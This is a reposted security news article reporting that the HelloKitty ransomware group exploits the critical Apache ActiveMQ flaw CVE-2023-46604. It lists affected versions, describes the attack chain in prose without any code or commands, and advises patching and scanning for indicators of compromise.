HomeCyber BalkansHello Kitty Ransomware Group Exploiting Apache ActiveMQ Vulnerability

Hello Kitty Ransomware Group Exploiting Apache ActiveMQ Vulnerability

Published on

spot_img


Cybersecurity researchers are warning of suspected exploitation of a recently disclosed critical security flaw in the Apache ActiveMQ open-source message broker service that could result in remote code execution.

“In both instances, the adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations,” cybersecurity firm Rapid7 disclosed in a report published Wednesday.

“Based on the ransom note and available evidence, we attribute the activity to the HelloKitty ransomware family, whose source code was leaked on a forum in early October.”

The intrusions are said to involve the exploitation of CVE-2023-46604, a remote code execution vulnerability in Apache ActiveMQ that allows a threat actor to run arbitrary shell commands.

It’s worth noting that the vulnerability carries a CVSS score of 10.0, indicating maximum severity. It has been addressed in ActiveMQ versions 5.15.16, 5.16.7, 5.17.6, or 5.18.3 released late last month.

The vulnerability affects the following versions –

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Since the bug’s disclosure, a proof-of-concept (PoC) exploit code and additional technical specifics have been made publicly available, with Rapid7 noting that the behavior it observed in the two victim networks is “similar to what we would expect from exploitation of CVE-2023-46604.”

Successful exploitation is followed by the adversary attempting to load remote binaries named M2.png and M4.png using the Windows Installer (msiexec).

Both the MSI files contain a 32-bit .NET executable named dllloader that, in turn, loads a Base64-encoded payload called EncDLL that functions akin to ransomware, searching and terminating a specific set of processes before commencing the encryption process and appending the encrypted files with the “.locked” extension.

The Shadowserver Foundation said it found 3,326 internet-accessible ActiveMQ instances that are susceptible to CVE-2023-46604 as of November 1, 2023. A majority of the vulnerable servers are located in China, the U.S., Germany, South Korea, and India.

In light of the active exploitation of the flaw, users are recommended to update to the fixed version of ActiveMQ as soon as possible and scan their networks for indicators of compromise.

Update#

Cybersecurity company Huntress has also confirmed the HelloKitty ransomware infections, stating “exploitation for this attack is trivial.”

Reference: https://thehackernews.com/2023/11/hellokitty-ransomware-group-exploiting.html?utm_source=dlvr.it&utm_medium=linkedin

AH



Source link

Latest articles

More than 60 Credit Unions in the U.S. Affected by Cyber Attack

A ransomware attack on an IT provider used by more than 60 credit unions...

Bank of England to Conduct Review of AI Risks to UK Financial Stability

The Bank of England has announced that it will be conducting an assessment in...

NANS criticizes EFCC’s assertion of students involvement in cybercrimes

The Economic and Financial Crimes Commission's claim that seven out of 10 Nigerian students...

23andMe Data Breach Exposes Information of 6.9 Million Users – The Atlanta Journal Constitution

A data breach at the popular genetic testing company 23andMe has exposed the personal...

More like this

More than 60 Credit Unions in the U.S. Affected by Cyber Attack

A ransomware attack on an IT provider used by more than 60 credit unions...

Bank of England to Conduct Review of AI Risks to UK Financial Stability

The Bank of England has announced that it will be conducting an assessment in...

NANS criticizes EFCC’s assertion of students involvement in cybercrimes

The Economic and Financial Crimes Commission's claim that seven out of 10 Nigerian students...